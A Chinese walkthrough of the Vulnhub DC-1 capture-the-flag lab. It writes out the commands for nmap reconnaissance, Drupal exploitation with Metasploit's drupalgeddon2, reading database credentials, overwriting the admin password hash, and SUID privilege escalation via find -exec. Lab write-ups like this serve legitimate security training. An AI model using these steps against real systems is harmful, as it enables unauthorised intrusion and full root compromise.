当前位置: 首页 > news >正文

【Vulnhub靶场】DC-1

DC-1靶场下载链接:https://download.vulnhub.com/dc/DC-1.zip

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

通过nmap扫存活主机,得到目标ip,扫出其端口信息及服务

nmap -sP 192.168.118.0/24nmap -p- 192.168.118.138nmap -sV -A 192.168.118.138

这里得到其发放了22端口以及80端口

首先访问一下他的web服务:http://192.168.118.138

这里发现一个登录框,首先想到的肯定得是SQL注入了呗,简单尝试以后,行不通

然后此web页面也再没有其他信息

接下来简单收集一下其web指纹,这里使用 whatweb

 这里可以看到其CMS框架是 Drupal 7 版本

MSF漏洞利用

 先直接使用MSF探查一下漏洞

这里发现有众多漏洞,在选择漏洞是首先考虑版本最相近的,不然就一个一个尝试吧,这里我最后选择“1”漏洞

use exploit/unix/webapp/drupal_drupalgeddon2show optionsset rhosts 192.168.118.138run

这里发现payload已经设置好,可以得到shell,设置好相关漏洞,直接运行

 浅浅shell一下,然后使用Python方法实现交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

flag1

ls一下,看到flag1.txt ,快快打开查看内容

得到 flag1,重要信息应该就是这个CMS的配置文件,接下来我们就得找这个配置文件了

发现是settings.php,在sites/default/files中,在刚在的文件中,记得是有sites这个文件的,直接进去查看此配置文件

flag2

发现里面有flag2,它好像作用也不是很大,但在下面有了详细的数据库信息,还是个mysql,账号密码就这样诱惑着我,那就连接呗

mysql -u dbuser -p R0ck3t

然后就是在数据库中找一找我们想要的信息了 

这里就是一步步找出敏感信息,我就直接给出结果了

show databases;
use drupaldb;
show tables;
select * from users\G;

这里找到了两个用户的信息,看着复杂的密码,尝试了解密,没有任何效果

接下来我们就有两个思路吧,修改密码或者添加新用户

百度参考drupal数据库存放用户密码的加密脚本文件,直接就找到了:/var/www/scripts/password-hash.sh

那应该这个密码就是hash加密了吧,那接下来就修改密码吧

首先我们生成出123456的hash

php scripts/password-hash.sh 123456

我们重新进入数据库,将admin的密码替换为这个加密后的hash

update drupaldb.users set pass="$S$DBdjFBevhOwTeP.UcmRJMfef2lfNMPYS3ykCOaG2UKTkE2gCEAiL" where name='admin';

重新查看用户信息,密码修改成功

接下来我们重新登录刚开始web页面,使用刚修改好的账号密码登录( admin :123456)

OK,登录进去了,最终在里面成功找到 flag3

flag3 

里面说的大概是让我去找passwd和shadow之类的

passwd里面存放的是一般是用户信息一些的,进去查看一下

cat /etc/passwd

 发现里面出现了flag4,后面给出了一个路径,尝试进去查看一下,最终得到了flag4

flag4

falg4里面的信息大概意思是说要得到 root 权限,才能得到 flag

SUID提权

那下一步就是提权了,结合前面找到的信息,应该是SUID提权

find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -print 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;

 以上三条命令都可以查看到具有SUID权限的文件

find 提权

提权过程:创建一个名为aaa文件夹,尝试在 aaa 目录下执行 /bin/bash 命令  

find 命令结合 -exec 参数来执行不同的命令

-exec:对匹配的文件执行该参数所给出的shell命令

touch aaafind aaa -exec "/bin/sh" \;

 提权成功

thefinalflag 

cd到root目录下,最终得到 thefinalflag


http://www.mrgr.cn/news/56946.html

相关文章:

  • python程序设计员—练习笔记
  • OptiTrack光学跟踪系统在虚拟制片、运动分析、遥操作中的应用
  • Web保存状态的手段(Session的使用)
  • OQE-OPTICAL AND QUANTUM ELECTRONICS
  • 深度学习(一)基础:神经网络、训练过程与激活函数(1/10)
  • [Luogu 4630] APIO2018 铁人两项(广义圆方树)
  • 【Java设计模式】1-15章
  • 从0开始深度学习(18)——层和块
  • Java岗临近面试,如何短期突击通过?
  • Qml 动态元素---状态与过渡 --学习测试用例
  • 精华帖分享 | 散户看法-基于邢大散户反着买小视频衍生出的择时指标及这个指标的应用-如何由此构成择时策略
  • 二、KNN算法详解
  • 探索工业自动化网络新境界:FR-TSN交换机与CC-Link IE TSN协议的结合应用
  • 5GC核心网中的南向与北向
  • 智能听诊器:猫咪健康的智能守护者
  • 「C/C++」C++ STL容器库 之 std::map 键值对的集合容器
  • 什么是机器人流量?如何识别和预防有害机器人流量?
  • 预售即断货!西圣H1头戴式耳机好评如潮,99%满意度引爆市场!
  • 『完整代码』坐骑召唤
  • 如何让别人喜欢你的代码
  • 视觉分析在烟火检测中的应用
  • 光谱共焦位移传感器的应用方案组成及测量领域
  • 功能自动化测试工具Appium使用步骤讲解
  • 【uniapp使用内置组件barcode遇到的问题】
  • 2024最新版鸿蒙纯血原生应用开发教程文档丨HarmonyOS 开发准备-成为华为开发者
  • 全面解读商用条码扫描器通信方式